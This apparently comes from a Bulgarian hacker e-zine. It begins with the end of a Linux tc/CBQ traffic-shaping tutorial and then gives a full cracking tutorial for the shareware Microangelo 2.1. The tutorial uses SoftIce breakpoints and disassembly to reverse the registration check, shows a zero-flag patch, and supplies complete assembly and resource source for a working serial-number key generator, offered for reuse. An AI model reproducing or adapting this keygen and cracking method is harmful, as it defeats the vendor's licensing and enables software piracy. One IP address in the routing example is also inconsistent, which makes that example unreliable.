ip route add 129.237.125.150 via 129.237.125.146 dev eth0 flow 1:2
Tuk se zadava pravilo za ip 129.237.125.150 sas gateway 129.237.125.146,
Kato celia traffik prinadlezi na klas, chiito handle e 1:2
I nai-nakraia, sled tolkova izpisani gluposti, neka da razgledam edin realen
primer.
Neka da imame 3 computera: computer1, koito e s ip 10.10.10.149. Neka
srednata golemina na paketa da e 1000 baita. I da imame 2 klasa: edin za
traffica kam mashinata s ip 10.10.10.146 (computer2), i traffica kam
mashinata 10.10.10.148 (computer3). T.e. s edna duma, da se ogranichi
trafficyt na mashini computer2, i computer3. Traffica kam computer2 e s
po-visok prioritet ot toia kam computer3. Kam computer2 se puska 1Mbps, a
kam computer3 - 5Mbps.
Na computer 1:
--------------
#Attachvame Qdisc kam eth0. (tam sa vurzani drugite dve mashini).
#Maksimalnata vazmozna skorost e 10Mbits.
tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit cell 8 avpkt 1000\
mpu 64
#Definirame root klasa. Toi ima 10Mbits.
tc class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 10Mbit rate\
10MBit allot 1514 cell 8 weight 1Mbit prio 8 maxburst 20 avpkt 1000
#Traffic cam computer2. Prioriteta e 3, a skorostta e 1Mbit.
tc class add dev eth0 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate\
1Mbit allot 1514 cell 8 weight 100Kbit prio 3 maxburst 20 avpkt 1000 split\
1:0
#Traffic kam computer 3. Prioriteta e 7, a skorostta e 5Mbits.
tc class add dev eth0 parent 1:1 classid 1:3 cbq bandwidth 10Mbit rate\
5Mbit allot 1514 cell 8 weight 800Kbit prio 7 maxburst 20 avpkt 1000 split\
1:0
#Slagame route klasifikatora
tc filter add dev eth0 parent 1:0 protocol ip prio 100 route
#Slagame route i pravila za computer2
ip route add 10.10.10.146 via 10.10.10.149 flow 1:2
#Slagame route i pravila za computer3
ip route add 10.0.10.148 via 10.10.10.149 flow 1:3
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#11ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Cracking Microangelo v2.1 K.E.
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
"(B.Red: ej, znachi toia...pak si e puhnal celia source... Ama wzimajte
primer ot nego be - pishe niakoia po-interesna programa, prasne edno .txt
kak ia e napisal i stawa statia. E tolkowa li e trudno ?)"
Phm 19
Ami ne e trudno. Eto, wzimame primer.
Ne smjatam, che sum naj-podhodjashtijat da ucha horata na cracking, shtoto i
az imam oshte mnogo da ucha, no sled kato horata, koito razbirat ot taja
rabota, si mulchat ili chakat specialna pokana (wij suobshtenieto na GaBOSS
ot [Wed Jun 30 20:08:50 1999] wyw Phreedom MessageBoard), taka e.
Moje bi puk, sled kato sum "newbie", objasneniata mi shte budat po-dostupni
za horata, nadjawam se...
Za kakwo stawa duma? Imame programa (Microangelo 2.1 by Impact Software,
www.impactsoft.com), kojato ni suzdawa problemi s towa, che naglo zajawjawa,
che smjata da raboti 30 dena i sled towa da ni preporucha specialitet "Lubo
Penev" (njakoi mu wikat i "Monika":). Obache nie sluchajno imame i slednite
tools: SoftIce, W32Dasm, TASM, brain..., i hich ne sme suglasni s tazi
perspektiwa (za supata).
Step 1: Subirane na nachalna informacia za programata
-----------------------------------------------------
Microangelo e redaktor za iconi i animirani cursori za Win. Sustoi se ot
njakolko modula (EXEta), koito mogat da se puskat samostojatelno ili se
wikat wzaimno edin drug - Microangelo Animator, Microangelo Browser,
Microangelo Engineer, Microangelo Librarian i Microangelo Studio. Pochti
wsichki imat komanda " Register" w menuto File, s izkluchenie na Browsera,
kojto njama nikakwi menuta. W dir, kudeto se instalira, ima i edin DLL
(Muapp.dll), kojto se izpolzwa ot wsichki moduli - towa se wijda s QuickView
ili s W32Dasm, kato razlikata e, che s QuickView e po-burzo, shtoto ne,
chakame da se dizasemblira exe-to, no puk za smetka na towa W32Dasm ni se
otplashta za chakaneto s dopulnitelna informacia - imenata na
exportnatite/importnati funkcii, naj-interesnata ot koito e KnockKnock. No
sega njama da wurwim po tozi put, zashtoto sledwa:
Step 2: Pronikwane
------------------
Njamam predwid analno ili drugo podobno, a pronikwane s breakpoint. Puskame
si SoftIce i slagame BPX na po-populjarnite funkcii:
bpx GetWindowText
bpx GetWindowTextA
bpx GetDlgItemText
bpx GetDlgItemTextA
Okazwa se, che tazi, kojato ni trjabwa, e poslednata, i towa e logichno,
zashtoto programata e 32-bitowa i seriiniat nomer se wuwejda w dialogow
prozorez, no wse pak dobre e chowek da probwa i chetirite, shtoto se
sluchwat iznenadki i izkluchenia ot prawilata.
Slagame, znachi, breakpoint na GetDlgItemTextA i pishem lubite si ime i
nomer. Az shte probwam s "Phreedom" i "123456789". Natiskame OK i se
ozowawame w SoftIce, w nachaloto na GetDlgItemTextA. Natiskame F5, za da
izlezem ot SoftIce, no wednaga pak se ozowawame w nego - dwe izwikwania na
funkciata, za da prochete purwo imeto i posle nomera. Sega weche natiskame
F11, za da widim koi li e tozi, deto wika GetDlgItemTextA.
Ako njakoj se chudi kakwi sa tezi F-owe, deto gi natiskam, da znae, che
izpolzwam nastrojkite na SoftIce po default za prednaznachenieto na
funkcionalnite klawishi, kato F5 e ekwiwalentno na komandata "x", napisana
na komandnia red (exit), a F11 e "G @SS:ESP" - slaga wremenen breakpoint na
adresa, kojto e na wurha na stack-a, i ima smisul samo kogato ste na purwata
instrukcia ot njakoi call i na wurha na stack-a se namira toku-shto
push-natia tam Return Address. Togawa rezultatut ot F11 e, che "izlizate" ot
call-a bez da gubite kontrol wurhu izpulnenieto na programata (otnositelno
kazano, no za sluchaja s WinAPI e wjarno).
Sled kato izlezem ot GetDlgItemTextA, ot statusa na SoftIce razbirame, che
se namirame w koda na muapp.dll (MUAPP!.text+18FD) i wijdame slednoto:
0137:100028E3 PUSH 10008310 ; imeto
0137:100028E8 PUSH 000003ED
0137:100028ED MOV EDI,[USER32!GetDlgItemTextA]
0137:100028F3 PUSH ESI
0137:100028F4 CALL EDI
0137:100028F6 PUSH 0A
0137:100028F8 PUSH 10008180 ; reg#
0137:100028FD PUSH 000003EE
0137:10002902 PUSH ESI
0137:10002903 CALL EDI
0137:10002905 CMP BYTE PTR [10008180],50 ; zapochwa li s 'P'
0137:1000290C JNZ 10002915
0137:1000290E MOV EBP,00000001
0137:10002913 JMP 10002937
0137:10002915 CMP BYTE PTR [10008180],54 ; ili s 'T'
0137:1000291C JNZ 10002925
0137:1000291E MOV EBP,00000002
0137:10002923 JMP 10002937
0137:10002925 CMP BYTE PTR [10008180],53 ; ili 'S'
0137:1000292C JNZ 10002A11 ; sorry ako ne
0137:10002932 MOV EBP,00000003
Namirame se na adres 10002905, toku shto sme izlezli ot tozi call edi,
kojto, ako poglednem po-nagore, wijdame, che wsushnost e call
User32!GetDlgItemTextA. Poglejdame parametrite, koito se predawat na tazi
funkcia w dwete i izwikwania, za da nauchim adresite, kudeto sa imeto i
nomera ni. Prowerkata prawim s komandata "d adddress", w sluchaja
"d 10008310" i "d 10008180". Mejdu dwete komandi e dobre da smenim data
prozoreca, za da mojem da si gi durjim pod oko.
SoftIce ima 4 razlichni data prozoreca, koito se smenjat s komandata "data"
(dobra ideja e da se asociira tazi komanda s klawisha F1, zashtoto po
default toj e "h" (help) i e napulno bezpolezen). Wseki data prozorec si
pazi adresa, kojto trjabwa da pokazwa, otrazjawa promenite realtime, taka
che s natiskane na F1 (sled predefiniraneto mu) mojem ciklichno da smenjame
mejdu 4 razlichni mesta ot pametta, koito iskame da nabludawame, za da widim
dali njakoj call, koito sme preskochili s F10 (step), ne gi e promenil.
Prowerkata na dwata adresa pokazwa, che na 10008310 se namira imeto, a na
10008180 e nomerut. Poglejdame koda i wijdame, che sledwashtata instrukcia,
kojato shte se izpulni, prowerjawa dali purwata bukwa ot nomera ne e "P"
(ASCII code #50), a malko po-nadolu i dali ne e "T" ili "S". Poneje nashiat
nomer ne zapochwa nito s "P", nito s "T" ili "S", ako prawim samo "step"
(F10), za da nabludawame kakwo stawa, dostigame do JUMP-a na adres 1000292C,
kojto e taka narechenia "jump bad_boy", zashtoto skacha tam, kudeto
programata se oplakwa "Invalid registration information". Probwame njakoj
reg# s "P" w nachaloto, naprimer "P123456789". Tozi put EBP stawa 1 i
skachame na 10002937:
0137:10002937 XOR EBX,EBX
0137:10002939 PUSH 10008181 ; adr(nomera) + 1
0137:1000293E CALL 100037E0 ; konvertira ot string kum chislo
0137:10002943 ADD ESP,04
0137:10002946 MOV [1000836C],EAX
0137:1000294B CMP EBP,03
0137:1000294E JZ 1000295D
0137:10002950 CDQ
0137:10002951 MOV ECX,0000000A
0137:10002956 IDIV ECX
0137:10002958 MOV [1000836C],EAX
0137:1000295D PUSH 10008180
0137:10002962 MOV EDI,[KERNEL32!lstrlen]
0137:10002968 CALL EDI
0137:1000296A MOVSX EAX,BYTE PTR [EAX+1000817F]
0137:10002971 SUB EAX,30
0137:10002974 PUSH 10008310
0137:10002979 MOV [10008174],EAX ; zapomnja poslednata cifra
0137:1000297E CALL EDI
0137:10002980 CMP EAX,06 ; prowerka za duljinata
0137:10002983 JLE 10002A0D ; na imeto
0137:10002989 CMP EBP,01
0137:1000298C JNZ 10002997
0137:1000298E CALL 10002070
0137:10002993 TEST EAX,EAX
0137:10002995 JNZ 100029B3
0137:10002997 CMP EBP,02
0137:1000299A JNZ 100029A5
0137:1000299C CALL 100021D0
0137:100029A1 TEST EAX,EAX
0137:100029A3 JNZ 100029B3
0137:100029A5 CMP EBP,03
0137:100029A8 JNZ 10002A0D
0137:100029AA CALL 10002320
0137:100029AF TEST EAX,EAX
0137:100029B1 JZ 10002A0D
Wijdame edin call na 1000293E, kojto poluchawa kato parametur 10008181,
koeto e nashia nomer bez purwata bukwa, deto e "P". Izhoda na funkciata se
suhranjawa w [1000836C], koeto bi trjabwalo da ni naprawi lubopitni kakuw li
e toj. W sluchaja njama nujda da wlizame w call-a za da razberem -
dostatuchno e da naprawim "step" wurhu nego i da prowerim kakwo e
sudurjanieto na EAX: "d eax" ne ni pokazwa nishto interesno, no "? eax" ni
pokazwa, che w desetichen wid sudurjanieto na eax e "123456789" - hahaha,
mnogo originalno, da wi e poznato ot njakude? I kwo stawa posle? Towa chislo
se zapazwa w [1000836C], no ako ebp e 3, togawa purwo se deli na 0Ah i
togawa se zapazwa.
Koga ebp=3? Ami kogato purwata bukwa ot nomera ni e "S". Po-nadolu se prawi
prowerka za duljinata na wuwedenoto ime (ako e po-malka ili rawna na 6 -
duhame), zapomnja se w [10008174] poslednata cifra ot wuwedenia nomer (purwo
se konwertira ot ASCII w chislo kato se wadi 30) i programata se razklonjawa
na 3 w zawisimost dali ebp e 1, 2 ili 3, t.e. dali purwata bukwa na reg# e
suotwetno "P", "T", "S". Wikat se 3 razlichni call- a, koito prawjat
razlichni smetki i wrushtat bulew izraz - true, ako nomerut otgowarja, ili
false, ako ne.
Samo za eksperiment moje da step-nem do 10002995, kudeto stigame, zashtoto
pisahme "P" w nachaloto na nomera i suotwetno ebp=1, i wijdame, che eax=0 i
programata se kani da skochi w neprawilna posoka, zatowa, kakto si sedim na
10002995, promenjame Zero flaga s komandata "rfl z", kojato predwidliwo sme
si asociirali kum inache bezpoleznata kombinacia ALT+F1, zashtoto chesto se
nalaga da se polzwa. Puskame ja weche da si se izpulnjawa i sledwa
"Thank you... bla bla", wse edno, che e registrirana. Da, ama ne e - ako
izlezem i pak wlezem, ni posreshta s woj "Invalid registration information
detected in the installation" i trugwa pak unregistered.
Maj dosta nadulboko "proniknahme", red e na sledwashtata stupka:
Step 3: Analiz
--------------
Moje da se patch-ne, taka che njakoi jump-owe da skachat winagi w edna
posoka, no zaradi trite wida nomera shte bude malko trudno da se naprawi
uniwersalen patch taka, che programata da priema wsichko, koeto i wuwedesh,
oswen towa shte trjabwa da se patch-wa na mnogo mesta i shte stane edna
kasapnica... Moje da se skape neshto.
Zatowa po-lesno izglejda da se naprawi generator. Za celta shte izsledwame
call-a na adress 1000298E: call 10002070 - pishem si pak "Phreedom" i
"P123456789" i step-wame, dokato ne dostignem wurhu nashia call, sled towa
natiskame F8 (trace), za da wlezem wutre.
Tam ni posreshta edna ujasjawashta poredica ot instrukcii ot slednia tip:
LEA EBP,[EBP*8+EBP] ili LEA EBP,[EBP*2+EAX], koito na pruw pogled
izglejdat sjakash usileno se polzwa njakakwa tablica w pametta, kojato njama
otkude da znaem kakwo sudurja i po kakuw zakon e populnena, no wsushnost ne
e taka. Az za pruw put se sbluskwam s podoben nachin na izchislenie, no towa
e fakt - purwata instrukcia wse edno umnojawa EBP po 8 i slaga rezultata w
EBP, a wtorata umnojawa EBP po 2, pribawja kum nego EAX i pak rezultata w
EBP.
(Bel.Iron - tova vsushtnost e udoben i chesto izpolzvan ot opitnite
programisti nachin za burzo umnozhenie. Ne e trudno, naprimer, da se
izvurshi burzo umnozhenie na 5 ili 9, che dori i sled tova da se dobavi
oshte neshto - LEA EAX,[EAX*8+EAX] naprimer, koiato izvurshva
umnozhenie na 9, na 486 se izpulniava za 1 ili 2 takta (ako EAX e bil
promenian v predishnata instrukcia), dokato MUL e celi 13)
Takiwa mnogokratni umnojenia i pribawjania se prawjat s wsjaka bukwa ot
imeto koeto sme wuweli, kato se poluchawat 6 sumi w EDI, ECX, ESI, [ESP+10],
[ESP+14] i EDX. Posle wsichko se sumira w EAX i se deli znakowo na 987355h,
ot ostatuka w EDX se wadi chisloto, namirashto se w [1000836C] (nashia reg#,
konwertiran ot string kum number) i se prowerjawa dali rezultata e
0FFFFDCD6h. Ako da - togawa se srawnjawa poslednata cifra ot serijnia nomer,
kojato se pazi w [10008174] s edno chislo, koeto se podawa kato parametur na
funkciata, w kojato se namirame, tazi s GetDlgItemTextA w neja.
Tja, mejdu drugoto, e onazi majtapchijskata KnockKnock, i lesno se
prowerjawa, che razlichnite moduli ja wikat po edin put (na edno mjasto w
koda si) s razlichni stojnosti na tozi parametur: MUEDIT - 2, MUENGNR - 7,
MUMGR - 1. Obache w nachaloto na call-owete, koito obslujwat nomerata s "P"
i "T", se prawi prowerka dali poslednata cifra ne e 1, 2, 4 za "P" ili 3, 5,
6 za "T", i ako ne e, naprawo izliza s false bez wuobshte da smjata sumite i
da deli na 987355h.
Oshte po-chudno e, che kato si naprawih edin nomer s "P" se okaza, che s
nego se registrirat chast ot modulite na programata, a druga chast - ne
(naprimer browsera se regwa, a animatora - ne). Oswen towa s nomer,
zapochwasht s "T" nishto ne moje da se registrira, zashtoto za nego se
iziskwa poslednata cifra da e 3, 5 ili 6, a puk nikoj modul ne wika
KnockKnock s takuw parametur.
Okazwa se obache, che nomerata sus "S" wurwjat chudno - pri tjah ne se prawi
prowerka za poslednata cifra. Znachi shte prawim generator za "S" nomera.
Polzwame slednata shema: smjatame sumite, delim na 987355h i ot ostatuka
wadim 0FFFFDCD6h, rezultata preobrasuwame w string kato desetichno chislo
sus znak (samo ako e minus go pishem) i, pribawjaiki otpred edno "S",
poluchawame waliden registracionen nomer za wuwedenoto ime.
Step 4 The KeyGen
-----------------
Na tozi etap shte triabwa da si kradnem malko kod ot MUAPP.DLL, za da ne se
izmorim sluchajno pri opita sami da si go suchinjawame. Purwo shte slojim
edin BPX na adres 10002320, kojto nauchawame ot "call 10002320", che e w
nachaloto na procedurata za "S" nomerata. Sled towa izchistwame wsichki
drugi breakpoints, izlizame ot SoftIce i pishem w Microangelo "Phreedom" i
"S123456789", natiskame OK i sme wutre. Namirame se na 10002320, tochno w
nachaloto na procedurata, razlistwame malko po-nadolu (CTRL+PgDOWN), za da
widim kude swurshwa tja i ustanowjawame, che 120h bytes shte e dostatuchno.
Pishem na komandnia red "Pause OFF", za da ne spira izwejdaneto kato se
zapulni stranicata, sled towa "cls", za da izchistim bufera ot glupostite, i
"u 10002320 l 120", za da izkarame coda w history bufera na SoftIce, kojto
posle s komandata "Save History to file" na Symbol Loader-a si zapazwame w
LOG-file. Predi komandata "u" moje da naprawim "code off", za da skriem
baitowoto predstawjane na instrukciite w sluchai, che predi towa e bilo
wklucheno - w momenta po-skoro shte ni prechi, otkolkoto pomaga.
Sega weche si otwarjame save-natia file, za da si razgledame pljachkata:
0137:10002320 SUB ESP,08
0137:10002323 XOR ECX,ECX
0137:10002325 XOR EDX,EDX
0137:10002327 PUSH EBX
0137:10002328 PUSH ESI
0137:10002329 PUSH EDI
0137:1000232A XOR BX,BX
0137:1000232D PUSH EBP
0137:1000232E XOR ESI,ESI
0137:10002330 XOR EDI,EDI
0137:10002332 MOV [ESP+14],ESI ; trjabwa da e hex
0137:10002336 MOV [ESP+10],ESI ; sushto hex
0137:1000233A MOV DWORD PTR [10008364],00000001 ; nenujno
0137:10002344 MOVSX EAX,BX
0137:10002347 MOVSX EAX,BYTE PTR [EAX+10008310]
0137:1000234E TEST EAX,EAX
0137:10002350 JZ 100023F5
0137:10002356 INC BX
0137:10002358 LEA EBP,[EAX*2+EAX]
0137:1000235B LEA EBP,[EBP*4+EBP+00]
0137:1000235F SUB EDI,EAX
0137:10002361 SUB ECX,EAX
0137:10002363 SUB EDX,EAX
0137:10002365 LEA EBP,[EBP*8+EAX]
0137:10002368 SHL EBP,03
0137:1000236B LEA EBP,[EBP*8+EBP+00]
0137:1000236F LEA EBP,[EBP*8+EAX]
0137:10002372 ADD ESI,EBP
0137:10002374 LEA EBP,[EAX*2+EAX]
0137:10002377 LEA EBP,[EBP*4+EBP+00]
0137:1000237B LEA EBP,[EBP*8+EAX]
0137:1000237E LEA EBP,[EBP*8+EAX]
0137:10002381 SHL EBP,03
0137:10002384 LEA EBP,[EBP*8+EBP+00]
0137:10002388 ADD ECX,EBP
0137:1000238A LEA EBP,[EAX*8+EAX]
0137:1000238D LEA EBP,[EBP*8+EBP+00]
0137:10002391 LEA EBP,[EBP*8+EBP+00]
0137:10002395 SUB EBP,EAX
0137:10002397 LEA EBP,[EBP*8+EAX]
0137:1000239A LEA EBP,[EBP*2+EBP+00]
0137:1000239E LEA EDX,[EBP*4+EDX]
0137:100023A1 MOV EBP,EAX
0137:100023A3 SHL EBP,05
0137:100023A6 ADD EBP,EAX
0137:100023A8 ADD EBP,EAX
0137:100023AA LEA EBP,[EBP*8+EAX]
0137:100023AD LEA EBP,[EBP*8+EAX]
0137:100023B0 LEA EBP,[EBP*4+EAX]
0137:100023B3 LEA EBP,[EBP*8+EAX]
0137:100023B6 ADD [ESP+14],EBP ; hex
0137:100023BA LEA EBP,[EAX*8+EAX]
0137:100023BD LEA EBP,[EBP*8+EAX]
0137:100023C0 SHL EBP,03
0137:100023C3 SUB EBP,EAX
0137:100023C5 SHL EBP,03
0137:100023C8 LEA EBP,[EBP*2+EBP+00]
0137:100023CC LEA EBP,[EBP*4+EBP+00]
0137:100023D0 ADD EDI,EBP
0137:100023D2 LEA EBP,[EAX*8+EAX]
0137:100023D5 LEA EBP,[EBP*8+EBP+00]
0137:100023D9 LEA EBP,[EBP*8+EBP+00]
0137:100023DD LEA EBP,[EBP*8+EAX]
0137:100023E0 LEA EBP,[EBP*2+EBP+00]
0137:100023E4 LEA EAX,[EBP*4+EAX]
0137:100023E7 ADD [ESP+10],EAX ; hex
0137:100023EB CMP BX,2B ; hex
0137:100023EF JL 10002344
0137:100023F5 MOV EAX,[ESP+10] ; hex
0137:100023F9 ADD EAX,EDI
0137:100023FB ADD EAX,[ESP+14] ; hex
0137:100023FF ADD EAX,EDX
0137:10002401 ADD EAX,ECX
0137:10002403 MOV ECX,00987355 ; hex
0137:10002408 ADD EAX,ESI
0137:1000240A CDQ
0137:1000240B IDIV ECX
0137:1000240D SUB EDX,[1000836C]
0137:10002413 CMP EDX,FFFFDCD6 ; hex
0137:10002419 JNZ 10002432 ; nenujno
0137:1000241B MOV EAX,00000001 ; nenujno
0137:10002420 POP EBP
0137:10002421 MOV DWORD PTR [10008364],00000000 ; nenujno
0137:1000242B POP EDI
0137:1000242C POP ESI
0137:1000242D POP EBX
0137:1000242E ADD ESP,08
0137:10002431 RET ; po-nadolu ne ni trjabwa
Predi da iztriem adresite wljawo, triabwa da si oprawim jump-owete - tuk ima
samo dwa neobhodimi (purwite dwa, tretiat e "bad_boy"). Krushtawame si gi s
neshto opisatelno ili prosto s @1 i @2 (slagame etiketite @1: i @2: tam,
kudeto skachat jump-owete, a samite jumpowe promenjame na "jmp @x").
Sled towa prawim njakoi kozmetichni promeni, za da moje da se kompilira
koda - iztriwame redowe 1000233A i 10002419,1B,21 i oglejdame dobre
chislata, za da postawim "h" otzad na wsjako > 9. Takiwa tuka sa 10, 14, 2B,
00987355 i FFFFDCD6.
Redyt 10002347 "MOVSX EAX,BYTE PTR [EAX+10008310]" trjabwa da stane
"MOVSX EAX, BYTE PTR buffer[EAX]", za da sochi kum imeto, koeto sme wuweli
(buffer e promenliwa, kudeto se suhranjawa imeto), a puk redut 1000240D
"SUB EDX,[1000836C]" da stane "SUB EDX,0FFFFDCD6h".
Na mjastoto na red 10002413, kojto pazehme samo za da copy/pastnem chisloto
FFFFDCD6 ot nego, sega trjabwa da se zameni s neshto za izwejdane na ekrana
na stojnostta w EDX w desetichen wid, zawisi dali generatorut shte raboti
pod DOS ili pod Win. W sluchaja shte e pod Win i zatowa polzwame nagotowo
API-to "call wsprintf, offset codeb+1, offset formatstr, edx", kato ne
zabrawjame sled towa da si izchistim stack-a s "add esp,12", shtoto w
Win32.hlp pishe, che funkciata wsprintf ne se griji sama za towa.
Parametrite sa: codeb e bufer, kudeto da sloji formatirania string (+1,
zashtoto w nachaloto predwaritelno sme si slojili "S"), formatstr e "%ld",
koeto kara funkciata da konvertira w "long decimal" chisloto, zadadeno kato
treti parametur.
Sega weche adresite otljawo na koda ne sa ni nujni i mojem da gi iztriem.
Ako imate DOS Navigator, naprawo ste shtastliwci i mojete da se wuzpolzwate
ot wuzmojnostta mu da raboti s blokowe ot tekst - natiskate F5, za da minete
w rejim na blokowe, i izbirate samo adresite, posle CTRL+DEL i gotowo. Ako
njamate DN, shte wi se otkachi rukata da triete red po red :)
Towa cjaloto neshto shte bude procedura w nashia keygen zatowa mu izmisljame
ime (naprimer GenCode) i pishem w nachaloto "GenCode Proc" i w kraja
"GenCode endp".
Tjaloto na programata si e kato na wsjaka Win32 programa, zatowa njama da go
komentiram, a samo shte posocha promenite, koito karat nashia keygen da
raboti. Prawim si interface (s njakoj resource editor ili na ruka s tekstow
redaktor), kojto da predstawljawa dialog s dwa tekstowi editbox-a, suotwetno
za imeto i za nomera. Ot butoni i menuta njama nujda, no ako iskate da si
naprawite menu "About", za da se objawite na sweta koi ste, ste swobodni da
si gi naprawite, az ne amjatam za neobhodimo. Eto wi primeren RC file :
-------------------------------- makgen.rc ---------------------------------
#define IDC_STATIC -1
#define IDC_EDIT1 3003
#define IDC_EDIT2 3004
MyCLASS DIALOGEX MOVEABLE IMPURE LOADONCALL DISCARDABLE 0, 0, 160, 90, 0
STYLE DS_3DLOOK | WS_MINIMIZEBOX | WS_VISIBLE | WS_SYSMENU | DS_CENTER |
WS_POPUP
CAPTION "Microangelo 2.1 CodeGen"
CLASS "MyCLASS"
FONT 8, "MS Sans Serif"
BEGIN
LTEXT "Your Name:", IDC_STATIC, 11,10,40,8
EDITTEXT IDC_EDIT1, 11,25,99,12, ES_AUTOHSCROLL | ES_LEFT
LTEXT "Your code:", IDC_STATIC, 11,45,40,8
EDITTEXT IDC_EDIT2, 11,60,99,12, ES_AUTOHSCROLL | ES_LEFT
GROUPBOX "",IDC_STATIC,5,0,150,85
END
----------------------------------------------------------------------------
Idejata e slednata: shte sledim suobshtenieto EN_UPDATE, koeto editbox-a s
imeto prashta na dialoga, kogato njakoi promeni teksta w nego, i ako teksta
e stanal po-dulug ot 6 simwola - generirame reg# i go prashtame w drugia
editbox. Eto pulnia source :
------------------------------ makgen.asm ----------------------------------
.386P
Locals
jumps
.Model Flat ,StdCall
UNICODE = 0
INCLUDE w32.inc
.DATA
wc WNDCLASSEX <0>
msg MSG <0>
ClassName db 'MyCLASS',0
formatstr db '%ld',0
errstr db 'Enter >6 chars for name',0
codeb db 'S', 11 dup(0)
buffer db 2Bh dup(?),0
.Data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hDlg HWND ?
hEDIT1 HWND ?
hEDIT2 HWND ?
.const
IDC_EDIT1 equ 3003
IDC_EDIT2 equ 3004
.CODE
Start:
call GetModuleHandle, NULL
mov hInstance,eax
call GetCommandLine
mov CommandLine,eax
call WinMain, hInstance, NULL, CommandLine, SW_SHOWDEFAULT
call ExitProcess,eax
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:SDWORD
mov wc.wc_cbSize,WNDCLASSEX_
mov wc.wc_style, CS_HREDRAW or CS_VREDRAW
mov wc.wc_lpfnWndProc, OFFSET WndProc
mov wc.wc_cbClsExtra,NULL
mov wc.wc_cbWndExtra,DLGWINDOWEXTRA
push hInstance
pop wc.wc_hInstance
mov wc.wc_hbrBackground,COLOR_BACKGROUND
mov wc.wc_lpszMenuName,NULL
mov wc.wc_lpszClassName,OFFSET ClassName
call LoadIcon,hInstance,IDI_APPLICATION
mov wc.wc_hIcon,eax
mov wc.wc_hIconSm,eax
call LoadCursor,NULL,IDC_ARROW
mov wc.wc_hCursor,eax
call RegisterClassEx, offset wc
call CreateDialogParam,hInstance,offset ClassName,NULL,NULL,NULL
mov hDlg,eax
call ShowWindow, hDlg,SW_SHOWNORMAL
call UpdateWindow, hDlg
call GetDlgItem,hDlg,IDC_EDIT1
mov hEDIT1,eax
call SetFocus,eax
call GetDlgItem,hDlg,IDC_EDIT2
mov hEDIT2,eax
.WHILE TRUE
call GetMessage, offset msg,NULL,0,0
.BREAK .IF (!eax)
call IsDialogMessage, hDlg, offset msg
.IF eax ==FALSE
call TranslateMessage, offset msg
call DispatchMessage, offset msg
.ENDIF
.ENDW
mov eax,msg.ms_wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
mov eax,uMsg
.IF eax==WM_DESTROY
call PostQuitMessage,NULL
xor eax,eax
.ELSEIF eax==WM_COMMAND
mov eax,wParam
.IF !(lParam==0)
.IF ax==IDC_EDIT1
shr eax,16
.IF ax==EN_UPDATE
call GetWindowText, hEDIT1, offset buffer, 2Bh
.IF eax > 6
call GenCode
call SetWindowText, hEDIT2, offset codeb
.ELSE
call SetWindowText, hEDIT2, offset errstr
.ENDIF
.ENDIF
.ENDIF
.ENDIF
.ELSE
call DefWindowProc,hWnd,uMsg,wParam,lParam
.ENDIF
ret
WndProc endp
GenCode proc
SUB ESP,08
XOR ECX,ECX
XOR EDX,EDX
PUSH EBX
PUSH ESI
PUSH EDI
XOR BX,BX
PUSH EBP
XOR ESI,ESI
XOR EDI,EDI
MOV [ESP+14h],ESI
MOV [ESP+10h],ESI
@1: MOVSX EAX,BX
MOVSX EAX,BYTE PTR buffer[eax]
TEST EAX,EAX
JZ @2
INC BX
LEA EBP,[EAX*2+EAX]
LEA EBP,[EBP*4+EBP+00]
SUB EDI,EAX
SUB ECX,EAX
SUB EDX,EAX
LEA EBP,[EBP*8+EAX]
SHL EBP,03
LEA EBP,[EBP*8+EBP+00]
LEA EBP,[EBP*8+EAX]
ADD ESI,EBP
LEA EBP,[EAX*2+EAX]
LEA EBP,[EBP*4+EBP+00]
LEA EBP,[EBP*8+EAX]
LEA EBP,[EBP*8+EAX]
SHL EBP,03
LEA EBP,[EBP*8+EBP+00]
ADD ECX,EBP
LEA EBP,[EAX*8+EAX]
LEA EBP,[EBP*8+EBP+00]
LEA EBP,[EBP*8+EBP+00]
SUB EBP,EAX
LEA EBP,[EBP*8+EAX]
LEA EBP,[EBP*2+EBP+00]
LEA EDX,[EBP*4+EDX]
MOV EBP,EAX
SHL EBP,05
ADD EBP,EAX
ADD EBP,EAX
LEA EBP,[EBP*8+EAX]
LEA EBP,[EBP*8+EAX]
LEA EBP,[EBP*4+EAX]
LEA EBP,[EBP*8+EAX]
ADD [ESP+14h],EBP
LEA EBP,[EAX*8+EAX]
LEA EBP,[EBP*8+EAX]
SHL EBP,03
SUB EBP,EAX
SHL EBP,03
LEA EBP,[EBP*2+EBP+00]
LEA EBP,[EBP*4+EBP+00]
ADD EDI,EBP
LEA EBP,[EAX*8+EAX]
LEA EBP,[EBP*8+EBP+00]
LEA EBP,[EBP*8+EBP+00]
LEA EBP,[EBP*8+EAX]
LEA EBP,[EBP*2+EBP+00]
LEA EAX,[EBP*4+EAX]
ADD [ESP+10h],EAX
CMP BX,2Bh
JL @1
@2: MOV EAX,[ESP+10h]
ADD EAX,EDI
ADD EAX,[ESP+14h]
ADD EAX,EDX
ADD EAX,ECX
MOV ECX,00987355h
ADD EAX,ESI
CDQ
IDIV ECX
SUB EDX,0FFFFDCD6h
call wsprintf, offset codeb+1, offset formatstr, edx
add esp,12
POP EBP
POP EDI
POP ESI
POP EBX
ADD ESP,08
RET
GenCode endp
end Start
----------------------------------------------------------------------------
Po-murzeliwite mogat da si polzwat tozi source nagotowo, kato smenjat samo
sudurjanieto na procedurata GenCode. Trjabwa da imate fajla w32.inc, za da
kompilirate uspeshno, az lichno sum go wzel ili ot njakoj source na
stranicata na Iczelion, deto Solar Eclipse wi ja preporuchwa w phm20, ili ot
site-a na Stone:
http://207.30.50.126/
, kojto go njama sred preporuchanite, no tam mu e mjastoto, spored men.
